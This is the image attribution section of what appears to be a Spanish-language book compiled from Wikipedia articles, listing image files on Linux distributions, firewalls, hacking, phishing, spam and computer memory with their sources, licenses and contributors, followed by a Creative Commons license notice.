Attribution-Share Alike Contribuyentes: Carolingio93 Image:OpenSUSE_12.1_KDE_desktop.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:OpenSUSE_12.1_KDE_desktop.png Licencia: Creative Commons Attribution-Sharealike 3.0 Contribuyentes: Wiedemann Image:Slackware.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Slackware.png Licencia: GNU General Public License Contribuyentes: Uploader Image:Pantallazo_de_Ubuntu_11_10.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Pantallazo_de_Ubuntu_11_10.png Licencia: GNU General Public License Contribuyentes: Canonical Ltd. Archivo:SabayonLinux-7-GNOME.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SabayonLinux-7-GNOME.png Licencia: Creative Commons Attribution-Share Alike Contribuyentes: VARGUX Image:Pup-430.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Pup-430.png Licencia: desconocido Contribuyentes: Vishy1618 Image:SLAX.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SLAX.png Licencia: GNU General Public License Contribuyentes: http://hacktolive.org/ Image:Pclos20092.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Pclos20092.jpg Licencia: GNU General Public License Contribuyentes: PCLinuxOS Developer Team Image:Canaima-desktop2.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Canaima-desktop2.png Licencia: GNU General Public License Contribuyentes: Guerrerocarlos Image:Joventux_3.0.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Joventux_3.0.png Licencia: Creative Commons Attribution-Sharealike 3.0 Contribuyentes: User:Yoansierra Image:Daxos-colibri.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Daxos-colibri.png Licencia: Creative Commons Attribution-Sharealike 3.0 Contribuyentes: User:Davis150 Archivo:servidor.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Servidor.jpg Licencia: Creative Commons Attribution-Share Alike Contribuyentes: Alberto Juarez Espinoza Archivo:Stachledraht DDos Attack.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Stachledraht_DDos_Attack.svg Licencia: Creative Commons Attribution-Share Alike Contribuyentes: Everaldo Coelho and YellowIcon Archivo:Anonymous Flag.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Anonymous_Flag.svg Licencia: Public Domain Contribuyentes: Allen4names, Anime Addict AA, AnonMoos, AnonymousLegion, Cycn, Dynamicwork, FredrikT, Hide-sp, Jcb, Kizar, Linfocito B, Ludger1961, Masur, Mattes, Necr0manzer, Plflcn, Rion, Simon Villeneuve, Tempest27, Trijnstel, Uweick, 6 ediciones annimas Archivo:Anonymous at Scientology in Los Angeles.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Anonymous_at_Scientology_in_Los_Angeles.jpg Licencia: Creative Commons Attribution-Sharealike 2.0 Contribuyentes: Vincent Diamante Archivo:Spanish Wikiquote.SVG Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Spanish_Wikiquote.SVG Licencia: logo Contribuyentes: James.mcd.nz Archivo:Wikinews-logo.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Wikinews-logo.svg Licencia: logo Contribuyentes: Vectorized by Simon 01:05, 2 August 2006 (UTC) Updated by Time3000 17 April 2007 to use official Wikinews colours and appear correctly on dark backgrounds. Originally uploaded by Simon. File:Firewall.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Firewall.png Licencia: Creative Commons Attribution-Sharealike 3.0,2.5,2.0,1.0 Contribuyentes: Bruno Pedrozo Image:Gufw 10.04.4.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Gufw_10.04.4.png Licencia: GNU General Public License Contribuyentes: BenIsaacs, Krnerbrtchen Archivo: Bastion host.JPG Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Bastion_host.JPG Licencia: Creative Commons Zero Contribuyentes: Titigns Archivo:Ubuntu Feisty Fawn Firestarter.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Ubuntu_Feisty_Fawn_Firestarter.png Licencia: GNU Free Documentation License Contribuyentes: Emx Archivo:Yes_check.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Yes_check.svg Licencia: Public Domain Contribuyentes: SVG by Gregory Maxwell (modified by WarX) Archivo:Gufw-005.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Gufw-005.png Licencia: GNU General Public License Contribuyentes: Astur Archivo:X mark.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:X_mark.svg Licencia: Public Domain Contribuyentes: User:Gmaxwell Archivo:Razor1911 JEDACID HQ.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Razor1911_JEDACID_HQ.jpg Licencia: Attribution Contribuyentes: JeD / ACiD Archivo:Wikibooks-logo.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Wikibooks-logo.svg Licencia: logo Contribuyentes: User:Bastique, User:Ramac et al. Archivo:H96566k.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:H96566k.jpg Licencia: Public Domain Contribuyentes: AVRS, Balcer, Circeus, Colfer2, Cwbm (commons), Dcoetzee, Editor at Large, Jatkins, Markhurd, Mr.freedoom, Para, Roo72, Waldir, 6 ediciones annimas Archivo:Glider.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Glider.svg Licencia: Public Domain Contribuyentes: Eric S. Raymond File:HappyHackingBicicleta.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:HappyHackingBicicleta.png Licencia: Creative Commons Attribution-Sharealike 3.0 Contribuyentes: User:Omerta-ve Archivo:PhishingTrustedBank.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:PhishingTrustedBank.png Licencia: Public Domain Contribuyentes: Andrew Levine Archivo:Phishing chart.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Phishing_chart.png Licencia: Public domain Contribuyentes: Original uploader was ZeWrestler at en.wikipedia Archivo:Firefox 2.0.0.1 Phising Alert.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Firefox_2.0.0.1_Phising_Alert.png Licencia: Creative Commons Attribution-ShareAlike 3.0 Unported Contribuyentes: AVRS, KErosEnE, PolhoNinja, Remember the dot, 1 ediciones annimas Archivo:Spammed-mail-folder.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Spammed-mail-folder.png Licencia: GNU General Public License Contribuyentes: Ascnder, Bawolff, Jfd34, KAMiKAZOW, LordT, Nixn, RJaguar3, 12 ediciones annimas Archivo:SpamInACan.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SpamInACan.jpg Licencia: Public Domain Contribuyentes: USAF Archivo:Circle of spam.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Circle_of_spam.svg Licencia: Creative Commons Attribution-ShareAlike 3.0 Unported Contribuyentes: odder Archivo:No-spam.svg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:No-spam.svg Licencia: Public Domain Contribuyentes: Indolences Archivo:Nuclear rat.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Nuclear_rat.png Licencia: Public Domain Contribuyentes: Trojaniest Archivo:Kingston KVR1333 IMGP5970 wp wp.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Kingston_KVR1333_IMGP5970_wp_wp.jpg Licencia: GNU Free Documentation License Contribuyentes: smial (talk) Archivo:Electronic Memory.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Electronic_Memory.jpg Licencia: Creative Commons Attribution 2.0 Contribuyentes: Steve Jurvetson from Menlo Park, USA

Fuentes de imagen, Licencias y contribuyentes


Archivo:4mbramvax.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:4mbramvax.jpg Licencia: GNU Free Documentation License Contribuyentes: Poil 12:38, 21 May 2005 (UTC) Archivo:SIPP-Modul.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SIPP-Modul.jpg Licencia: Creative Commons Attribution-Sharealike 2.0 Contribuyentes: User Smial on de.wikipedia Archivo:SIMM-muistikampoja.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:SIMM-muistikampoja.jpg Licencia: GNU Free Documentation License Contribuyentes: J-P Krn Archivo:RamTypes.JPG Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:RamTypes.JPG Licencia: Creative Commons Attribution 3.0 Contribuyentes: KB Alpha Archivo:Memoria RAM.JPG Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Memoria_RAM.JPG Licencia: Public Domain Contribuyentes: Chrihern Archivo:BGA RAM.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:BGA_RAM.jpg Licencia: GNU Free Documentation License Contribuyentes: User Smial on de.wikipedia Archivo:Motherboard diagram.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Motherboard_diagram.jpg Licencia: GNU Free Documentation License Contribuyentes: en:User:Moxfyre Archivo:jerarquia memoria.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Jerarquia_memoria.png Licencia: Public Domain Contribuyentes: ComputerMemoryHierarchy.png: User:Danlash at en.wikipedia.org Archivo:Microchips.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:Microchips.jpg Licencia: desconocido Contribuyentes: Original uploader was Zephyris at en.wikipedia Archivo:GeoffreyDummer.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:GeoffreyDummer.jpg Licencia: Creative Commons Attribution-Sharealike 3.0 Contribuyentes: User:Rjcuk Archivo:PCB Spectrum.jpg Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:PCB_Spectrum.jpg Licencia: Creative Commons Attribution-Sharealike 2.5 Contribuyentes: Bill Bertram Archivo:PCB design and realisation smt and through hole.png Fuente: http://es.wikipedia.org/w/index.php?title=Archivo:PCB_design_and_realisation_smt_and_through_hole.png Licencia: Public Domain Contribuyentes: User Mike1024

145

Licencia

146

Licencia
Creative Commons Attribution-Share Alike 3.0 Unported //creativecommons.org/licenses/by-sa/3.0/

You might also like